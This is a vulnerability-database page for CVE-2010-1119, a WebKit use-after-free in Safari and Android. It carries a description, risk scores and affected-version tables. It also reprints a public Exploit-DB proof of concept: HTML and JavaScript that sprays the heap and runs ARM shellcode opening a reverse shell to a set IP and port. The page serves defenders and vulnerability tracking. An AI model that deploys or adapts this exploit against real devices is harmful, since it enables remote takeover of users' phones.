CVE-2010-1119

critical

Published 2010-03-25 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-16974 remote android verified text · 2 KB

MJ Keith · 2011-03-14

Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free

text exploit Source: Exploit-DB

<html>
<!-- 
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };


var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

 do
 {
  scode += scode;
  scode2 += scode2;

 } while (scode.length<=0x1000);
 
scode2 += shell
 

        target = new Array();
        for(i = 0; i < 300; i++){
          
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}

                  document.write(target[i]);
                  document.write("<br />");
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}

}

 }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

OS impact

macOS Affected 24 releases

Version	Status	Fixed in
10.6.0	Affected	—
10.5.8	Affected	—
10.5.7	Affected	—
10.5.6	Affected	—
10.5.5	Affected	—
10.5.4	Affected	—
10.5.3	Affected	—
10.5.2	Affected	—
10.5.1	Affected	—
10.5.0	Affected	—
10.5	Affected	—
3.1.3	Affected	—
3.1.2	Affected	—
3.1	Affected	—
3.0.1	Affected	—
3.0	Affected	—
2.2.1	Affected	—
2.2	Affected	—
2.1.1	Affected	—
2.1	Affected	—
2.0.2	Affected	—
2.0.1	Affected	—
2.0.0	Affected	—
2.0	Affected	—

Application impact

Vendor	Product	Versions
apple	safari	`{"endIncluding":"4.0.5"}`
apple	safari	`1.0`
apple	safari	`1.0.0`
apple	safari	`1.0.0b1`
apple	safari	`1.0.0b2`
apple	safari	`1.0.1`
apple	safari	`1.0.2`
apple	safari	`1.0.3`
apple	safari	`1.1`
apple	safari	`1.1.0`
apple	safari	`1.1.1`
apple	safari	`1.2`
apple	safari	`1.2.0`
apple	safari	`1.2.1`
apple	safari	`1.2.2`
apple	safari	`1.2.3`
apple	safari	`1.2.4`
apple	safari	`1.2.5`
apple	safari	`1.3`
apple	safari	`1.3.0`
apple	safari	`1.3.1`
apple	safari	`1.3.2`
apple	safari	`2`
apple	safari	`2.0`
apple	safari	`2.0.0`
apple	safari	`2.0.1`
apple	safari	`2.0.2`
apple	safari	`2.0.3`
apple	safari	`2.0.4`
apple	safari	`3`
apple	safari	`3.0`
apple	safari	`3.0.0`
apple	safari	`3.0.0b`
apple	safari	`3.0.1`
apple	safari	`3.0.1b`
apple	safari	`3.0.2`
apple	safari	`3.0.2b`
apple	safari	`3.0.3`
apple	safari	`3.0.3b`
apple	safari	`3.0.4`
apple	safari	`3.0.4b`
apple	safari	`3.1`
apple	safari	`3.1.0`
apple	safari	`3.1.0b`
apple	safari	`3.1.1`
apple	safari	`3.1.2`
apple	safari	`3.2.0`
apple	safari	`3.2.1`
apple	safari	`3.2.2`
apple	safari	`3.2.3`
apple	safari	`4.0`
apple	safari	`4.0.0b`
apple	safari	`4.0.1`
apple	safari	`4.0.2`
apple	safari	`4.0.3`
apple	safari	`4.0.4`
apple	safari	`4.1`

References

CWEs

CWE-399

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.